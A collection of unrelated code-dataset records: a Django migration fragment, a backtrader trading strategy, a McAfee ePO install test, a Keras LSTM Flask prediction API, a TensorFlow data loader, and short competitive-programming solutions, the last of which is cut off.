max_length=100, verbose_name='\\u5b66\\u751f\\u7c7b\\u522b', choices=[('\\u76f4\\u535a\\u751f', '\\u76f4\\u535a\\u751f'), ('\\u7855\\u535a\\u8fde\\u8bfb', '\\u7855\\u535a\\u8fde\\u8bfb'), ('\\u7855\\u58eb\\u751f', '\\u7855\\u58eb\\u751f')]),\n ),\n migrations.AddField(\n model_name='visitor',\n name='title',\n field=models.CharField(default='\\u6b63\\u6559\\u6388', max_length=100, verbose_name='\\u5bfc\\u5e08\\u804c\\u79f0', choices=[('\\u6b63\\u6559\\u6388', '\\u6b63\\u6559\\u6388'), ('\\u526f\\u6559\\u6388', '\\u526f\\u6559\\u6388'), ('\\u535a\\u58eb\\u540e', '\\u535a\\u58eb\\u540e')]),\n ),\n ]\n","sub_path":"ccms/apps/members/migrations/0014_auto_20160305_1617.py","file_name":"0014_auto_20160305_1617.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"487165341","text":"from __future__ import (absolute_import, division,\n print_function, unicode_literals)\n\nimport datetime # For datetime objects\nimport os.path # To manage paths\nimport sys # To find out the script name (in argv[0])\n\n# Import the backtrader platform\nimport backtrader as bt\nimport backtrader.feeds as btfeeds\n\nimport pandas as pd\nimport streamlit as st\n\n# Create a Stratey\n\nclass TestStrategy(bt.Strategy):\n params = (('p1', 8), \n ('p2', 20),\n ('p3', 144),\n ('rsi', 40),\n ('rr', 4),\n ('rrp', 1),\n ('candleper', 0.005),\n ('delay', -1),\n ('pricelimitper', 0.001),\n ('bodyper', 0.7),\n )\n \n\n def log(self, txt, dt=None):\n ''' Logging function fot this strategy'''\n dt = dt or self.datas[0].datetime.date(0)\n #print('%s, %s' % (dt.isoformat(), txt))\n print('%s,%s, %s' % (dt.strftime(\"%d/%m/%Y\"),self.datas[0].datetime.time().strftime(\"%H:%M:%S\") ,txt))\n st.sidebar.write('%s,%s, %s' % (dt.strftime(\"%d/%m/%Y\"),self.datas[0].datetime.time().strftime(\"%H:%M:%S\") ,txt))\n\n def __init__(self):\n # Keep a reference to the \"close\" line in the data[0] dataseries\n self.dataclose = self.datas[0].close\n self.dataopen = self.datas[0].open\n self.datalow = self.datas[0].low\n self.datahigh = self.datas[0].high\n \n\n # To keep track of pending orders and buy price/commission\n self.order = None\n self.buyprice = None\n self.buycomm = None\n self.sl = 1\n self.reward = 0\n \n\n # Add a MovingAverageSimple indicator\n self.ema1 = bt.indicators.EMA(period=self.p.p1)\n self.ema2 = bt.indicators.EMA(period=self.p.p2)\n self.sma3 = bt.indicators.SMA(period=self.p.p3)\n \n self.rsi = bt.indicators.RSI(self.datas[0],plothlines=[55, 45])\n #self.vwap = bt.indicators.VWAP(self.datas[0])\n\n def notify_order(self, order):\n if order.status in [order.Submitted, order.Accepted]:\n # Buy/Sell order submitted/accepted to/by broker - Nothing to do\n return\n\n # Check if an order has been completed\n # Attention: broker could reject order if not enough cash\n if order.status in [order.Completed]:\n if order.isbuy():\n self.log(\n 'BUY EXECUTED, Price: %.2f, Cost: %.2f, Comm %.2f, candle_pos = %.2f,' %\n (order.executed.price,\n order.executed.value,\n order.executed.comm,\n len(self)))\n\n self.buyprice = order.executed.price\n self.buycomm = order.executed.comm\n else: # Sell\n self.log('SELL EXECUTED, Price: %.2f, Cost: %.2f, Comm %.2f candle_pos =%.2f,' %\n (order.executed.price,\n order.executed.value,\n order.executed.comm,\n len(self)))\n\n self.bar_executed = len(self)\n\n elif order.status in [order.Canceled, order.Margin, order.Rejected]:\n self.log('Order Canceled/Margin/Rejected')\n\n self.order = None\n\n def notify_trade(self, trade):\n if not trade.isclosed:\n return\n\n self.log('OPERATION PROFIT, GROSS %.2f, NET %.2f \\n \\n' %\n (trade.pnl, trade.pnlcomm))\n \n\n\n def next(self):\n # Simply log the closing price of the series from the reference\n #self.log('Close, %.2f' % self.dataclose[0])\n # Check if time is greater 9 30 or not\n \n if (self.data.datetime.time() < datetime.time(9,30) ) or (self.data.datetime.time() > datetime.time(15,10)) :\n return \n\n # Check if an order is pending ... if yes, we cannot send a 2nd one\n if self.order:\n return\n \n\n # Check if we are in the market\n if self.position.size == 0:\n \n # Not yet ... we MIGHT BUY if ... self.datas[0].close\n c0 = (self.dataclose[self.p.delay -2] > self.dataopen[self.p.delay-2]) #prev prev cadle green \n c1 = (self.dataclose[self.p.delay] > self.dataopen[self.p.delay]) # current candle green \n c2 = (self.dataclose[self.p.delay -1] > self.dataopen[self.p.delay-1]) #prev cadle red \n \n c3 = self.ema2[self.p.delay] > self.sma3[self.p.delay] ##20EMA > 144SMA\n \n c4 = abs(self.dataclose[self.p.delay] - self.ema2[self.p.delay] ) / self.ema2[self.p.delay] < 0.5/100 # (close - 20em )<0.5%\n c5 = ((self.datahigh[self.p.delay]-self.datalow[self.p.delay]) < self.p.candleper * self.dataclose[self.p.delay]) # hi-low < 0.5% of close\n \n c6 = self.dataclose[self.p.delay] > self.datahigh[self.p.delay -1] #crurrent close > prev high \n c7 = ( self.datahigh[self.p.delay-1] - self.datalow[self.p.delay-1] ) < ( self.datahigh[self.p.delay-2] - self.datalow[self.p.delay-2] ) # prev candle len shorter than prev prev candle len \n c8 = self.ema2[self.p.delay] > self.ema2[self.p.delay -1] and self.ema2[self.p.delay-1] > self.ema2[self.p.delay -2] #\n if (c0 & c1 & c2 & c3 & c4 & c5 & c6 & c7 & c8 ):\n ##diff = self.dataclose[0] - self.dataclose[lastred]\n rr = self.p.rr\n \n\n cash = self.stats.broker.cash[self.p.delay]\n maxRisk = cash * 0.01\n\n self.sl = 0.999* self.datalow[self.p.delay - 1] # SL: prev candle low - 0.1%\n diff = self.datalow[self.p.delay ] - self.sl\n self.reward = rr*diff+self.dataclose[self.p.delay]\n self.bsize = int(min(maxRisk/diff , cash/self.dataclose[self.p.delay]))\n # BUY, BUY, BUY!!! (with all possible default parameters)\n bprice = self.data.close[self.p.delay] * (1+self.p.pricelimitper)\n self.log(\" Buy Signal at candle_pos = \"+str(len(self))+ \" Buy limit at \"+ str(bprice))\n\n \n\n # Keep track of the created order to avoid a 2nd order\n #self.order = self.buy(size=self.bsize)\n \n self.order = self.buy(exectype=bt.Order.Stop,\n size=self.bsize,price=bprice,\n valid=datetime.datetime.now() + datetime.timedelta(minutes=30)\n )\n\n self.log('BUY CREATE, %.2f' % self.dataclose[self.p.delay])\n\n else:\n # Already in a position? check exit criteria\n\n # Long Eixt criteria\n e1 = (self.dataclose[0] < self.sl) # SL reached\n e2 = (self.dataclose[0] > self.reward) # Reward reached\n e3 = (self.dataopen[0] > self.reward) # Reward reached \n\n if (e1 | e2 | e3):\n # SELL, SELL, SELL!!! (with all possible default parameters)\n self.log('SELL CREATE... closed position, %.2f ' % self.dataclose[0])\n\n # Keep track of the created order to avoid a 2nd order\n self.order = self.sell(size=self.bsize)\n #printf(f) Close all positions EOD\n if self.position.size != 0:\n if self.data.datetime.time() > datetime.time(15,10):\n self.close(exectype=bt.Order.Market,size=self.position.size)\n","sub_path":"strategy2.py","file_name":"strategy2.py","file_ext":"py","file_size_in_byte":7320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"309843973","text":"#!/usr/bin/python\n\n# Copyright (C) 2010 McAfee, Inc. All rights reserved.\n# TestcaseID: ID001\n# TestcaseDescription: Sample description\nimport socket\nimport sys\nimport logging\nimport os\nimport time\n# Add common folder into the sys path for module importing\n_script_path = os.path.abspath(os.path.dirname(sys.argv[0]))\n_common_path = _script_path + '/../Common'\nsys.path.append(_common_path)\nsys.path.append(_script_path)\nimport commonFns\nimport ePOCommonFns\n\n# Import ePolicyOrchestrator class in current namespace\nfrom ePOCommonFns import ePolicyOrchestrator\n# Import CommonTest module into current namespace\nfrom CommonTest import *\n\n# Get testcase name\ntestcaseName = os.path.basename(sys.argv[0][:-3])\n\nclass TestCase(BaseTest):\n def __init__(self):\n logging.info(\"TestcaseID : ID001\")\n logging.info(\"Description : Sample description\")\n\n def init(self):\n logging.info(\"Initializing testcase %s\" % testcaseName)\n \n # Using the existing api.\n logging.debug('Reading the ePO details from config file')\n self._config_file = _common_path + '/mountConfig.xml'\n if not os.path.exists(self._config_file) :\n logging.error(\"Config file is missing. Could not continue.\")\n return 1\n\n self._config = commonFns.getMountVolumeDetails(self._config_file, 'epo')\n \n logging.debug(\"Creating ePolicyOrchestrator object\")\n self.epo = ePolicyOrchestrator(self._config['ip'], self._config['username'], self._config['password'])\n\n if commonFns.isProductInstalled() :\n logging.debug(\"Product already installed removing it\")\n subprocess.call( [ \"/usr/local/McAfee/uninstallMSC\" ],stdout=subprocess.PIPE,stderr=subprocess.PIPE)\n else:\n logging.info(\"No previous installation\")\n\n self.prod_name = 'MSMAVAS_1000'\n self.version = '1.0676'\n self.host = socket.gethostname().rstrip('.local')\n\n logging.debug(\"Checking if the package is already checked in the epo\")\n if not self.epo.isProductCheckedIn(self.prod_name) :\n logging.error(\"Product is not checked in into ePO. Could not continue\")\n return 1\n \n return 0\n\n def execute(self):\n logging.info(\"Executing testcase %s\" % testcaseName)\n\n logging.info('Checking if MA is installed or not')\n if not commonFns.isMcAfeeAgentInstalled() :\n self._ma_install_path = self.epo.getAgentInstaller()\n if not os.path.exists(self._ma_install_path) :\n logging.error(\"The install.sh file does not exist and hence could not install McAfee Agent\")\n return 1\n if not commonFns.installMcAfeeAgent(self._ma_install_path) :\n logging.error(\"Failed to install McAfee Agent\")\n return 1\n logging.info(\"Successfully installed McAfee Agent, now will continue with product installation\")\n while (not self.epo.systemExists(self.host)) :\n logging.debug(\"Waiting for machine to be listed in the epo\")\n time.sleep(60)\n\n # This will create the task, and also send the wakeup agent.\n logging.debug(\"Installing product %s version %s\" %(self.prod_name, self.version))\n self.epo.installProduct(self.host, self.prod_name, self.version, 'MAC')\n\n # Lets wait for 300 seconds for product to get installed.\n for t in range(0, 300, 5) :\n time.sleep(5)\n if commonFns.isProductInstalled() :\n logging.debug('Product got installed')\n break\n else :\n logging.error(\"Product still not installed after 300 seconds\")\n return 1\n return 0\n\n def verify(self):\n logging.info(\"Verifying testcase %s\" % testcaseName)\n\n logging.debug('Checking if product is installed')\n if not commonFns.isProductInstalled() :\n logging.error('Product is not installed.')\n return 1\n logging.debug('Product is installed successfully')\n return 0\n\n def cleanup(self):\n logging.info(\"Performing cleanup for testcase %s\" % testcaseName)\n # Copy logs and clean them.\n foundCrash = 0\n foundCrash = commonFns.copyLogs()\n commonFns.cleanLogs()\n\n if foundCrash != 0:\n logging.error(\"copylogs returned failure status. Maybe a product crash\")\n\n return foundCrash\n\n def __del__(self):\n pass\n\nif __name__ == \"__main__\":\n # Setup testcase\n setupTestcase(sys.argv)\n\n testObj = TestCase()\n\n # Perform testcase operations\n retVal = testObj.init()\n\n # Perform execute once initialization succeeds... \n if(retVal == 0):\n retVal = testObj.execute()\n\n # Once execution succeeds, perform verification...\n if(retVal == 0):\n retVal = testObj.verify()\n\n # Perform testcase cleanup\n retVal = retVal + testObj.cleanup()\n\n if(retVal == 0):\n resultString = \"PASS\"\n else:\n resultString = \"FAIL\"\n \n logging.info(\"Result of testcase %s: %s\" % (testcaseName, resultString) )\n sys.exit(retVal)\n\n\n","sub_path":"McAfee/src/TestAutomation/Testcases/FVT/EPO/EPO_Install_Product.py","file_name":"EPO_Install_Product.py","file_ext":"py","file_size_in_byte":5150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"413784161","text":"from keras.models import Sequential\nfrom keras.layers import LSTM\nfrom keras.layers import Dense, Dropout\nfrom numpy import genfromtxt\nfrom flask import Flask, request\nfrom flask_restful import Resource, Api, reqparse\nimport numpy\nimport codecs\nimport csv\nfrom sklearn.metrics import confusion_matrix,roc_auc_score,roc_curve,auc,accuracy_score\nfrom sklearn.metrics import precision_score,recall_score,classification_report\nimport matplotlib.pyplot as plt\nfrom keras.utils import np_utils\nimport numpy as np\nimport socket\nimport pandas as pd\nimport ast\nimport json\n\nimport os\nimport io\nimport requests\n\n\n# classification instance\ndef get_sequence(steps,time):\n x = [data[index] for index in range((time*10)+1 ,(time*10)+10+1)]\n x = numpy.delete(x, (data.shape[1]-1), axis=1)\n x= numpy.array(x)\n y = [Y[index] for index in range((time*10) ,(time*10)+10)]\n y=numpy.array(y)\n X = x.reshape(1, steps, (data.shape[1]-1))\n y = y.reshape(1, steps, y.shape[1])\n return X, y\n\ndef singleSequence():\n x = [single[1]]\n x = numpy.delete(x, (single.shape[1] - 1), axis=1)\n x = numpy.array(x)\n\n\ndata = genfromtxt('data.csv', delimiter=',')\nm =[data[i][-1] for i in range(1,7671)]\nY = np_utils.to_categorical(m)\n\n\n\nsteps = 10\n#LSTM\nmodel = Sequential()\nmodel.add(LSTM(30,input_shape = (None, (data.shape[1]-1)),return_sequences=True))\nmodel.add(Dropout(0.25))\nmodel.add(Dense(6, activation='softmax'))\n\nmodel.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['acc'])\n\nprint(model.summary())\n\n\n# train LSTM\nfor epoch in range(0,50):\n\tX,y = get_sequence(steps,epoch)\n\tmodel.fit(X, y,batch_size=1, verbose=0)\n\n\ncountp=0\ncountn=0\n\nypredicted = []\nyactual = []\n\nfor d in range(534,575):\n X,y = get_sequence(steps,d)\n #yactual[] = [y[i] for i in range(len(y))]\n yhat = model.predict(X,verbose=0)[0]\n for index1 in range(10):\n i = np.where(yhat[index1] == yhat[index1].max())\n hin = i[0]\n for index2 in range(6):\n if(index2==hin):\n yhat[index1][index2]=1\n else:\n yhat[index1][index2]=0\n j= yhat\n k= y[0]\n for index1 in range(10):\n ypredicted.append(j[index1])\n yactual.append(k[index1])\n\nya = []\nyp = []\nfor index1 in range(len(ypredicted)):\n if (ypredicted[index1][0]==1 and ypredicted[index1][1]==0 and ypredicted[index1][2]==0 and ypredicted[index1][3]==0 and ypredicted[index1][4]==0 and ypredicted[index1][5]==0):\n yp.append(0)\n if (ypredicted[index1][0]==0 and ypredicted[index1][1]==1 and ypredicted[index1][2]==0 and ypredicted[index1][3]==0 and ypredicted[index1][4]==0 and ypredicted[index1][5]==0):\n yp.append(1)\n if (ypredicted[index1][0]==0 and ypredicted[index1][1]==0 and ypredicted[index1][2]==1 and ypredicted[index1][3]==0 and ypredicted[index1][4]==0 and ypredicted[index1][5]==0):\n yp.append(2)\n if (ypredicted[index1][0]==0 and ypredicted[index1][1]==0 and ypredicted[index1][2]==0 and ypredicted[index1][3]==1 and ypredicted[index1][4]==0 and ypredicted[index1][5]==0):\n yp.append(3)\n if (ypredicted[index1][0]==0 and ypredicted[index1][1]==0 and ypredicted[index1][2]==0 and ypredicted[index1][3]==0 and ypredicted[index1][4]==1 and ypredicted[index1][5]==0):\n yp.append(4)\n if (ypredicted[index1][0]==0 and ypredicted[index1][1]==0 and ypredicted[index1][2]==0 and ypredicted[index1][3]==0 and ypredicted[index1][4]==0 and ypredicted[index1][5]==1):\n yp.append(5)\n \nfor index1 in range(len(yactual)):\n if (yactual[index1][0]==1 and yactual[index1][1]==0 and yactual[index1][2]==0 and yactual[index1][3]==0 and yactual[index1][4]==0 and yactual[index1][5]==0):\n ya.append(0)\n if (yactual[index1][0]==0 and yactual[index1][1]==1 and yactual[index1][2]==0 and yactual[index1][3]==0 and yactual[index1][4]==0 and yactual[index1][5]==0):\n ya.append(1)\n if (yactual[index1][0]==0 and yactual[index1][1]==0 and yactual[index1][2]==1 and yactual[index1][3]==0 and yactual[index1][4]==0 and yactual[index1][5]==0):\n ya.append(2)\n if (yactual[index1][0]==0 and yactual[index1][1]==0 and yactual[index1][2]==0 and yactual[index1][3]==1 and yactual[index1][4]==0 and yactual[index1][5]==0):\n ya.append(3)\n if (yactual[index1][0]==0 and yactual[index1][1]==0 and yactual[index1][2]==0 and yactual[index1][3]==0 and yactual[index1][4]==1 and yactual[index1][5]==0):\n ya.append(4) \n if (yactual[index1][0]==0 and yactual[index1][1]==0 and yactual[index1][2]==0 and yactual[index1][3]==0 and yactual[index1][4]==0 and yactual[index1][5]==1):\n ya.append(5)\nprint(len(ya))\nprint(len(yp))\n\n\nfor i in range(len(ya)):\n if(ya[i] == yp[i]):\n countp = countp+1\n else:\n if(i!=len(ya)-1):\n if((ya[i+1]!=0 and yp[i]!=0) or (ya[i-1]!=0 and yp[i]!=0)):\n countp=countp+1\n else:\n countn = countn+1\n else:\n countn = countn+1\n\n\nyaa=[]\nypp=[]\nfor i in range(len(ya)-1):\n if(ya[i]==yp[i]):\n yaa.append(ya[i])\n ypp.append(yp[i])\n else:\n if(ya[i]!=yp[i]):\n if((ya[i]==2 and yp[i+1]==2) or (ya[i-1]==2 and yp[i]==2) or (ya[i]==2 and yp[i-1]==2) or (ya[i+1]==2 and yp[i]==2)):\n yaa.append(2)\n ypp.append(2)\n elif((ya[i]==3 and yp[i+1]==3) or (ya[i-1]==3 and yp[i]==3) or (ya[i]==3 and yp[i-1]==3) or (ya[i+1]==3 and yp[i]==3)):\n yaa.append(3)\n ypp.append(3)\n elif((ya[i]==4 and yp[i+1]==4) or (ya[i-1]==4 and yp[i]==4) or (ya[i]==4 and yp[i-1]==4) or (ya[i+1]==4 and yp[i]==4)):\n yaa.append(4)\n ypp.append(4)\n elif((ya[i]==5 and yp[i+1]==5) or (ya[i-1]==5 and yp[i]==5) or (ya[i]==5 and yp[i-1]==5) or (ya[i+1]==5 and yp[i]==5)):\n yaa.append(5)\n ypp.append(5)\n else:\n yaa.append(ya[i])\n ypp.append(yp[i])\n\n\n\nconf_arr = confusion_matrix(yaa, ypp)\nconf_ar_1 = confusion_matrix(ya, yp)\n\n\nprint(classification_report(yaa, ypp))\nprint(classification_report(ya, yp))\nprint(accuracy_score(yaa,ypp))\nprint(accuracy_score(ya,yp))\n\n\ntest_data = [65.71663828,2.000559697,0.927509588,1.367263894,28.9932391,-1.43680042,3.233846317,1.390503227,-0.003797961,-0.009765845,-0.001452424,-0.006051978,-0.006581628,-0.008367425,-0.007925678,-0.000485979,0.991099664,0.993213923,0.99992176,0.99450799,0.992888764,0.995900923,0.994969843,0.997058683,0.652125548,0.201729356,0.237883894,0.455559514,0.652909188,0.201363975,0.24440563,0.459197528,0.646552844,0.003788574,0.114773499,0.420182046]\ntest_data2 = np.array(test_data)\ntest_data3 = test_data2.reshape(1, 1, 36)\n\nresultnewTest = model.predict(test_data3, verbose=0)[0]\n\nprint(resultnewTest)\n\n\nfor index1 in range(1):\n i = np.where(resultnewTest[index1] == resultnewTest[index1].max())\n hin = i[0]\n for index2 in range(6):\n if(index2==hin):\n resultnewTest[index1][index2]=1\n else:\n resultnewTest[index1][index2]=0\n\n\nprint(resultnewTest)\ntest_data = [3.496975571,5.23133881,2.969923024,1.403945156,2.586841992,3.263263203,3.875656459,1.427367267,-0.00310496,-0.008150457,-0.004602477,-0.008577343,-0.001675536,-0.005400046,-0.005581164,-0.003245549,0.993325865,0.991415445,0.996473748,0.998845225,0.996452155,0.995826012,0.994582555,0.995877992,0.679476704,0.227064595,0.321708889,0.436399674,0.683794901,0.228052776,0.326327732,0.439317916,0.697691169,0.190961651,0.31343034,0.423416975]\ntest_data2 = np.array(test_data)\ntest_data3 = test_data2.reshape(1, 1, 36)\n\nresultnewTest = model.predict(test_data3, verbose=0)[0]\n\nprint(resultnewTest)\n\n\nfor index1 in range(1):\n i = np.where(resultnewTest[index1] == resultnewTest[index1].max())\n hin = i[0]\n for index2 in range(6):\n if(index2==hin):\n resultnewTest[index1][index2]=1\n else:\n resultnewTest[index1][index2]=0\n\n\nprint(resultnewTest)\n\napp = Flask(__name__)\napi = Api(app)\n\n@app.route('/predict', methods=['POST'])\ndef predict():\n request_data = request.get_json()\n\n test_data = [request_data['kurtosisx'],request_data['kurtosisy'],request_data['kurtosisz'],request_data['kurtosisf'],request_data['abs_kurtosisx'],request_data['abs_kurtosisy'],request_data['abs_kurtosisz'],request_data['abs_kurtosisf'],request_data['minx'],request_data['miny'],request_data['minz'],request_data['minf'],request_data['abs_minx'],request_data['abs_miny'],request_data['abs_minz'],request_data['abs_minf'],request_data['maxx'],request_data['maxy'],request_data['maxz'],request_data['maxf'],request_data['abs_maxx'],request_data['abs_maxy'],request_data['abs_maxz'],request_data['abs_maxf'],request_data['meanx'],request_data['meany'],request_data['meanz'],request_data['meanf'],request_data['abs_meanx'],request_data['abs_meany'],request_data['abs_meanz'],request_data['abs_meanf'],request_data['medianx'],request_data['mediany'],request_data['medianz'],request_data['medianf']]\n\n #test_data = [3.496975571,5.23133881,2.969923024,1.403945156,2.586841992,3.263263203,3.875656459,1.427367267,-0.00310496,-0.008150457,-0.004602477,-0.008577343,-0.001675536,-0.005400046,-0.005581164,-0.003245549,0.993325865,0.991415445,0.996473748,0.998845225,0.996452155,0.995826012,0.994582555,0.995877992,0.679476704,0.227064595,0.321708889,0.436399674,0.683794901,0.228052776,0.326327732,0.439317916,0.697691169,0.190961651,0.31343034,0.423416975]\n test_data2 = np.array(test_data)\n test_data3 = test_data2.reshape(1, 1, 36)\n resultnewTest = model.predict(test_data3, verbose=0)[0]\n for index1 in range(1):\n i = np.where(resultnewTest[index1] == resultnewTest[index1].max())\n hin = i[0]\n for index2 in range(6):\n if(index2==hin):\n resultnewTest[index1][index2]=1\n else:\n resultnewTest[index1][index2]=0\n return {\"t1\": str(resultnewTest[0][0]), \"t2\": str(resultnewTest[0][1]), \"t3\": str(resultnewTest[0][2]), \"t4\": str(resultnewTest[0][3]), \"t5\": str(resultnewTest[0][4]), \"t6\": str(resultnewTest[0][5])}, 200\n\nif __name__ == \"__main__\":\n app.run()\n","sub_path":"LSTM_API.py","file_name":"LSTM_API.py","file_ext":"py","file_size_in_byte":10432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"614211876","text":"#!/usr/bin/python3\nimport tensorflow as tf\nimport numpy as np\nimport pandas as pd\nfrom config import directories\n\nclass Data(object):\n\n @staticmethod\n def load_dataframe(filename, load_semantic_maps=False):\n df = pd.read_hdf(filename, key='df').sample(frac=1).reset_index(drop=True).sort_values(by='path',ascending=False)\n\n if load_semantic_maps:\n return df['path'].values, df['semantic_map_path'].values\n else:\n return df['path'].values\n\n @staticmethod\n def load_dataset(image_paths, batch_size, test=False, augment=False, downsample=False,\n training_dataset='cityscapes', use_conditional_GAN=False, **kwargs):\n\n def _augment(image):\n # On-the-fly data augmentation\n image = tf.image.random_brightness(image, max_delta=0.1)\n image = tf.image.random_contrast(image, 0.5, 1.5)\n image = tf.image.random_flip_left_right(image)\n\n return image\n\n def _parser(image_path, semantic_map_path=None):\n\n def _aspect_preserving_width_resize(image, width=512):\n height_i = tf.shape(image)[0]\n # width_i = tf.shape(image)[1]\n # ratio = tf.to_float(width_i) / tf.to_float(height_i)\n # new_height = tf.to_int32(tf.to_float(height_i) / ratio)\n new_height = height_i - tf.floormod(height_i, 16)\n return tf.image.resize_image_with_crop_or_pad(image, new_height, width)\n\n def _image_decoder(path):\n im = tf.image.decode_png(tf.read_file(path), channels=3)\n im = tf.image.convert_image_dtype(im, dtype=tf.float32)\n return 2 * im - 1 # [0,1] -> [-1,1] (tanh range)\n \n image = _image_decoder(image_path)\n\n # Explicitly set the shape if you want a sanity check\n # or if you are using your own custom dataset, otherwise\n # the model is shape-agnostic as it is fully convolutional\n\n # im.set_shape([512,1024,3]) # downscaled cityscapes\n\n if use_conditional_GAN:\n # Semantic map only enabled for cityscapes\n semantic_map = _image_decoder(semantic_map_path) \n\n if training_dataset == 'ADE20k':\n image = _aspect_preserving_width_resize(image)\n if use_conditional_GAN:\n semantic_map = _aspect_preserving_width_resize(semantic_map)\n # im.set_shape([None,512,3])\n\n if use_conditional_GAN:\n return image, semantic_map\n else:\n return image\n \n\n print('Training on', training_dataset)\n\n if use_conditional_GAN:\n dataset = tf.data.Dataset.from_tensor_slices((image_paths, kwargs['semantic_map_paths']))\n else:\n dataset = tf.data.Dataset.from_tensor_slices(image_paths)\n if test is False:\n dataset = dataset.shuffle(buffer_size=8)\n dataset = dataset.map(_parser)\n dataset = dataset.cache()\n #dataset = dataset.batch(batch_size,drop_remainder=tf.constant(True,dtype=tf.bool))\n dataset = dataset.apply(tf.contrib.data.batch_and_drop_remainder(batch_size))\n\n #if test:\n # dataset = dataset.repeat()\n\n return dataset\n\n @staticmethod\n def load_cGAN_dataset(image_paths, semantic_map_paths, batch_size, test=False, augment=False, downsample=False,\n training_dataset='cityscapes'):\n \"\"\"\n Load image dataset with semantic label maps for conditional GAN\n \"\"\" \n\n def _parser(image_path, semantic_map_path):\n def _aspect_preserving_width_resize(image, width=512):\n # If training on ADE20k\n height_i = tf.shape(image)[0]\n new_height = height_i - tf.floormod(height_i, 16)\n \n return tf.image.resize_image_with_crop_or_pad(image, new_height, width)\n\n def _image_decoder(path):\n im = tf.image.decode_png(tf.read_file(image_path), channels=3)\n im = tf.image.convert_image_dtype(im, dtype=tf.float32)\n return 2 * im - 1 # [0,1] -> [-1,1] (tanh range)\n\n\n image, semantic_map = _image_decoder(image_path), _image_decoder(semantic_map_path)\n \n print('Training on', training_dataset)\n if training_dataset is 'ADE20k':\n image = _aspect_preserving_width_resize(image)\n semantic_map = _aspect_preserving_width_resize(semantic_map)\n\n # im.set_shape([512,1024,3]) # downscaled cityscapes\n\n return image, semantic_map\n\n dataset = tf.data.Dataset.from_tensor_slices(image_paths, semantic_map_paths)\n dataset = dataset.map(_parser)\n dataset = dataset.shuffle(buffer_size=8)\n dataset = dataset.batch(batch_size)\n\n if test:\n dataset = dataset.repeat()\n\n return dataset\n\n @staticmethod\n def load_inference(filenames, labels, batch_size, resize=(32,32)):\n\n # Single image estimation over multiple stochastic forward passes\n\n def _preprocess_inference(image_path, label, resize=(32,32)):\n # Preprocess individual images during inference\n image_path = tf.squeeze(image_path)\n image = tf.image.decode_png(tf.read_file(image_path))\n image = tf.image.convert_image_dtype(image, dtype=tf.float32)\n image = tf.image.per_image_standardization(image)\n image = tf.image.resize_images(image, size=resize)\n\n return image, label\n\n dataset = tf.data.Dataset.from_tensor_slices((filenames, labels))\n dataset = dataset.map(_preprocess_inference)\n dataset = dataset.batch(batch_size)\n \n return dataset\n\n","sub_path":"ade_train_script/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":5856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"100397707","text":"#string='29 / 5 ='\n#print(string.split())\n\nfor test in range(2*int(input())):\n\ts=input()\n\ts=s.split()\n\tif(len(s)!=0):\n\t\tans=int(s[0])\n\t\tfor i in range(1,len(s)):\n\t\t\t#print(s[i])\n\t\t\tif s[i]=='+':\n\t\t\t\tans=ans+int(s[i+1])\n\t\t\t\ti+=1\n\t\t\telif s[i]=='-':\n\t\t\t\tans=ans-int(s[i+1])\n\t\t\t\ts[i]+=1\n\t\t\telif s[i]=='*':\n\t\t\t\tans=ans*int(s[i+1])\n\t\t\t\ti+=1\n\t\t\telif s[i]=='/':\n\t\t\t\tans=ans//int(s[i+1])\n\t\t\t\ti+=1\n\t\t\telif s[i]=='=':\n\t\t\t\tbreak\n\t\t\t#print(ans)\n\t\tprint(ans)","sub_path":"Spoj/spojARITH2.py","file_name":"spojARITH2.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"401688065","text":"#\n# @lc app=leetcode.cn id=127 lang=python3\n#\n# [127] 单词接龙\n#\n\n# @lc code=start\nimport string\nclass Solution:\n def ladderLength(self, beginWord: str, endWord: str, wordList) -> int:\n if endWord not in wordList:\n return 0\n front={beginWord}\n back={endWord}\n dist=1\n wordList=set(wordList)\n word_len=len(beginWord)\n while front:\n dist+=1\n next_front=set()\n for word in front:\n for i in range(word_len):\n for c in string.ascii_lowercase:\n if c!=word[i]:\n new_word=word[:i]+c+word[i+1:]\n if new_word in back:\n return dist\n if new_word in wordList:\n next_front.add(new_word)\n wordList.remove(new_word)\n front=next_front\n if len(back) int:\n# if endWord not in wordList or not endWord or not beginWord or not wordList:\n# return 0\n\n# L=len(beginWord)\n\n# all_combo_dict=defaultdict(list)\n# for word in wordList:\n# for i in range(L):\n# all_combo_dict[word[:i]+'*'+word[i+1:]].append(word)\n\n# queue=[(beginWord,1)]\n# visted={beginWord:True}\n# while queue:\n# current_word,level=queue.pop(0)\n# for i in range(L):\n# intermediate_word=current_word[:i]+'*'+current_word[i+1:]\n\n# for word in all_combo_dict[intermediate_word]:\n# if word==endWord:\n# return level+1\n# if word not in visted:\n# queue.append((word,level+1))\n# all_combo_dict[intermediate_word]=[]\n# return 0\n\n# def ladderLength(self, beginWord: str, endWord: str, wordList) -> int:\n# if endWord not in endWord:\n# return 0\n# length=len(beginWord)\n# dif=0\n# queue=deque()\n# queue.append(beginWord)\n# queue.append(',')\n# lay=2\n# while queue:\n# curr=queue.popleft()\n# if curr==',':\n# lay+=1\n# queue.append(',')\n# continue\n# for word in wordList:\n# for j in range(length):\n# if curr[j]!=word[j]:\n# dif+=1\n# if dif>=2:\n# dif=0\n# break\n# if dif==1:\n# if word==endWord:\n# return lay\n# queue.append(word)\n# dif=0\n# wordList.remove(word)\n# return 0\n\n# def ladderLength(self, beginWord: str, endWord: str, wordList) -> int:\n# if endWord not in endWord:\n# return 0\n# length=len(beginWord)\n# selected=[False]*len(wordList)\n# dif=0\n# queue=deque()\n# queue.append(beginWord)\n# queue.append(',')\n# lay=2\n# while queue:\n# curr=queue.popleft()\n# if curr==',':\n# lay+=1\n# queue.append(',')\n# continue\n# for i in range(len(wordList)):\n# if selected[i]:\n# continue\n# word=wordList[i]\n# for j in range(length):\n# if 